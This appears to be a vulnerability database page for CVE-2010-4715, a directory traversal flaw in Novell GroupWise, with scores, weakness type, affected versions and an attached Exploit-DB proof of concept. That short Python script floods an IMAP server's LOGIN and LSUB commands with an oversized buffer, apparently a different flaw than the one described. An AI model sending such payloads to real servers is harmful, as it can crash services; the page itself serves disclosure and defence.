CVE-2010-4715 : Detail

CVE-2010-4715

Directory Traversal
A01-Broken Access Control
0.95%V3
Network
2011-01-31
19h00 +00:00
2024-09-17
03h28 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple directory traversal vulnerabilities in the (1) WebAccess Agent and (2) Document Viewer Agent components in Novell GroupWise before 8.02HP allow remote attackers to read arbitrary files via unspecified vectors. NOTE: some of these details are obtained from third party information.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 34980

Publication date : 2010-11-07 23h00 +00:00
Author : Francis Provencher
EDB Verified : Yes

source: https://www.securityfocus.com/bid/44732/info Novell GroupWise is prone to multiple security vulnerabilities, including multiple remote code-execution vulnerabilities, an information-disclosure issue, and a cross-site scripting issue. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, obtain potentially sensitive information, or execute arbitrary code in the context of the user running the affected application. Information harvested may aid in further attacks; other attacks are also possible. #!/usr/bin/python # # Francis Provencher for Protek Research Lab's. # # import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = '\x41' * 1368 s.connect(('192.168.100.178',143)) s.recv(1024) s.send('A001 LOGIN test test ' + buffer + '\r\n') s.recv(1024) s.send('A001 LSUB aa ' + buffer + '\r\n') s.recv(1024) s.close()

Products Mentioned

Configuraton 0

Novell>>Groupwise >> Version To (including) 8.0.2

Novell>>Groupwise >> Version 4.1

    Novell>>Groupwise >> Version 4.1a

      Novell>>Groupwise >> Version 5.0

        Novell>>Groupwise >> Version 5.1

          Novell>>Groupwise >> Version 5.2

          Novell>>Groupwise >> Version 5.5

          Novell>>Groupwise >> Version 5.5

            Novell>>Groupwise >> Version 5.57e

            Novell>>Groupwise >> Version 6.0

            Novell>>Groupwise >> Version 6.0

              Novell>>Groupwise >> Version 6.0

                Novell>>Groupwise >> Version 6.0.1

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5.2

                Novell>>Groupwise >> Version 6.5.3

                Novell>>Groupwise >> Version 6.5.4

                Novell>>Groupwise >> Version 6.5.6

                Novell>>Groupwise >> Version 6.5.7

                Novell>>Groupwise >> Version 7.0

                Novell>>Groupwise >> Version 7.0.1

                  Novell>>Groupwise >> Version 7.0.2

                    Novell>>Groupwise >> Version 7.0.3

                    Novell>>Groupwise >> Version 7.0.4

                    Novell>>Groupwise >> Version 8.0

                    Novell>>Groupwise >> Version 8.0.1

                      References

                      http://secunia.com/advisories/40820
                      Tags : third-party-advisory, x_refsource_SECUNIA